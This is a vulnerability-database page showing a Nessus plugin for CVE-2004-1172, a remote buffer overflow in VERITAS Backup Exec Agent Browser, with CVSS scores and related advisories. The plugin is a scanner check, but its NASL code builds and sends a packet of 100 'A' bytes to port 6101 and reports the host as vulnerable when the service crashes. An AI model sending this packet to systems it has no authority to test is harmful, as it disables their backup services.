Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.VERITAS_BACKUP_EXEC_OVERFLOW2.NASL
HistoryJan 24, 2005 - 12:00 a.m.

VERITAS Backup Exec Agent Browser Registration Request Remote Overflow

2005-01-2400:00:00
This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
www.tenable.com
14

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.95 High

EPSS

Percentile

99.3%

JSON

The remote host is running a version of VERITAS Backup Exec Agent Browser which is vulnerable to a remote buffer overflow. An attacker may exploit this flaw to execute arbitrary code on the remote host or to disable this service remotely.

To exploit this flaw, an attacker would need to send a specially crafted packet to the remote service.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(16232);
 script_version("1.21");
 script_cvs_date("Date: 2018/08/06 14:03:14");

 script_cve_id("CVE-2004-1172");
 script_bugtraq_id(11974);

 script_name(english:"VERITAS Backup Exec Agent Browser Registration Request Remote Overflow");
 script_summary(english:"Test the VERITAS Backup Exec Agent Browser buffer overflow");

 script_set_attribute(attribute:"synopsis", value:
"Arbitrary code can be executed on the remote host." );
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of VERITAS Backup Exec Agent Browser
which is vulnerable to a remote buffer overflow. An attacker may exploit this
flaw to execute arbitrary code on the remote host or to disable this service
remotely.

To exploit this flaw, an attacker would need to send a specially crafted packet
to the remote service." );
 script_set_attribute(attribute:"solution", value:
"http://support.veritas.com/docs/273419" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Veritas Backup Exec Name Service Overflow');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value: "2004/12/16");
 script_set_attribute(attribute:"patch_publication_date", value: "2005/02/08");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/01/24");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:veritas_backup_exec");
 script_end_attributes();
 
 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
 script_family(english:"Gain a shell remotely");

 script_require_ports(6101);
 exit(0);
}

port = 6101;
if (!get_port_state (port)) exit (0);

soc = open_sock_tcp (port);
if (!soc) exit (0);

request = raw_string (0x02, 0x00, 0x00, 0x00) + crap (data:'A', length:100) + raw_string (0x00) + "172.0.0.1" + raw_string (0x00);
send (socket:soc, data:request);

close (soc);

sleep(2);

soc = open_sock_tcp (port);
if ( ! soc )
{ 
  security_hole(port);
}
VendorProductVersionCPE
symantecveritas_backup_execcpe:/a:symantec:veritas_backup_exec

Related

cvelist 1
nessus 1
cert 1
saint 4
nvd 1
checkpoint_advisories 1
securityvulns 1
cve 1
openvas 1
packetstorm 1
cvelist
cvelist
CVE-2004-1172
2004-12-22 05:00:00
nessus
nessus
Veritas Backup Exec Agent Browser 8.x < 8.60.3878 HF 68 / 9.0.x < 9.0.4454 HF 30 / 9.1.x < 9.1.4691 HF 40 RCE
2005-01-24 00:00:00
cert
cert
Veritas Backup Exec registration request buffer overflow
2005-01-14 00:00:00
saint
saint
VERITAS Backup Exec Agent Browser hostname buffer overflow
2006-04-07 00:00:00
VERITAS Backup Exec Agent Browser hostname buffer overflow
2006-04-07 00:00:00
VERITAS Backup Exec Agent Browser hostname buffer overflow
2006-04-07 00:00:00
nvd
nvd
CVE-2004-1172
2005-01-10 05:00:00
checkpoint_advisories
checkpoint_advisories
Veritas Backup Exec Agent Browser Registration Request Buffer Overflow (CVE-2004-1172)
2009-10-13 00:00:00
securityvulns
securityvulns
iDEFENSE Security Advisory 12.16.04: Veritas Backup Exec Agent Browser Registration Request Buffer Overflow Vulnerability
2004-12-17 00:00:00
cve
cve
CVE-2004-1172
2005-01-10 05:00:00
openvas
openvas
VERITAS Backup Exec Agent Browser Remote Buffer Overflow Vulnerability
2012-10-11 00:00:00
packetstorm
packetstorm
Veritas Backup Exec Name Service Overflow
2009-11-26 00:00:00

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.95 High

EPSS

Percentile

99.3%

JSON
Related for VERITAS_BACKUP_EXEC_OVERFLOW2.NASL
cvelist1nessus1cert1saint4nvd1checkpoint_advisories1securityvulns1cve1openvas1packetstorm1